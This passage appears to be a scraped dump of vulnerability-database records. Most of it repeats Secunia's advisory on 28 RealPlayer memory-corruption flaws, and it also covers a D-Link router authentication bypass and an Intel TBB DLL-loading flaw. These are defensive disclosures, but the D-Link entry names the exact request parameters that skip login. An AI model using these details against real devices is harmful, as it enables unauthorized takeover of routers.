22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"RealPlayer® SP lets you download video from thousands of Websites
– free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime."
Product Link:
http://www.real.com/realplayer/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in RealPlayer, which
can be exploited by malicious people to potentially compromise a
user's system.
======================================================================
6) Time Table
26/02/2010 - Vendor notified.
01/03/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-2579 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-14/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
VAR-201012-0015 | CVE-2010-0125 | RealNetworks RealPlayer AAC spectral data parsing vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, and Mac RealPlayer 11.0 through 12.0.0.1444 do not properly parse spectral data in AAC files, which has unspecified impact and remote attack vectors. Real Networks RealPlayer is prone to a memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
======================================================================
2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
======================================================================
3) Vendor's Description of Software
"RealPlayer® SP lets you download video from thousands of Websites
– free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime."
Product Link:
http://www.real.com/realplayer/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in RealPlayer, which
can be exploited by malicious people to compromise a user's system.
======================================================================
6) Time Table
01/03/2010 - Vendor notified.
01/03/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0125 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-15/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
VAR-201012-0017 | CVE-2010-0121 | RealNetworks RealPlayer cook codec vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 does not properly perform initialization, which has unspecified impact and attack vectors. Real Networks RealPlayer is prone to a memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format.
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number of streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen.
15) The vendor credits Chaouki Bekrar, Vupen.
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs.
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"RealPlayer® SP lets you download video from thousands of Websites
– free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime."
Product Link:
http://www.real.com/realplayer/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in RealPlayer, which
can be exploited by malicious people to potentially compromise a
user's system.
======================================================================
6) Time Table
24/02/2010 - Vendor notified.
25/02/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0121 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-9/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
VAR-201012-0368 | No CVE | D-Link DIR Router "bsc_lan.php" Security Bypass Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
D-Link DIR is a wireless router for the SOHO series. The D-Link DIR implementation has an error that allows remote attackers to bypass security restrictions and modify device configuration. The device does not correctly restrict access to the "bsc_lan.php" script. Requests with "NO_NEED_AUTH" parameter "1" and "AUTH_GROUP" parameter "0" can directly access the management interface.
----------------------------------------------------------------------
TITLE:
D-Link DIR Routers "bsc_lan.php" Security Issue
SECUNIA ADVISORY ID:
SA42425
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42425/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42425
RELEASE DATE:
2010-12-07
DISCUSS ADVISORY:
http://secunia.com/advisories/42425/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42425/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42425
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Craig Heffner has reported a security issue in multiple D-Link DIR
routers, which can be exploited by malicious people to bypass certain
security restrictions and compromise a vulnerable device.
This may be related to vulnerability #5:
SA33692
SOLUTION:
Restrict access to trusted hosts only (e.g. via network access
control lists).
PROVIDED AND/OR DISCOVERED BY:
Craig Heffner
ORIGINAL ADVISORY:
http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
VAR-201209-0075 | CVE-2010-5269 | Intel Threading Building Blocks tbb.dll Privilege Escalation Vulnerability |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Untrusted search path vulnerability in tbb.dll in Intel Threading Building Blocks (TBB) 2.2.013 allows local users to gain privileges via a Trojan horse tbbmalloc.dll file in the current working directory, as demonstrated by a directory that contains a .pbk file. NOTE: some of these details are obtained from third party information. Supplementary information: the vulnerability type has been identified as CWE-426: Untrusted Search Path (http://cwe.mitre.org/data/definitions/426.html). A local user may be able to gain privileges by placing a Trojan horse tbbmalloc.dll file in the current working directory.
----------------------------------------------------------------------
TITLE:
Intel Threading Building Blocks (TBB) Insecure Library Loading
Vulnerability
SECUNIA ADVISORY ID:
SA42506
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42506/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42506
RELEASE DATE:
2010-12-07
DISCUSS ADVISORY:
http://secunia.com/advisories/42506/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42506/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42506
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been discovered in Intel Threading Building
Blocks (TBB), which can be exploited by malicious people to
compromise a user's system.
The vulnerability is caused due to the "tbb.dll" loading libraries
(e.g. tbbmalloc.dll) in an insecure manner. This can be exploited to
load arbitrary libraries when an application using this library e.g.
opens a file located on a remote WebDAV or SMB share.
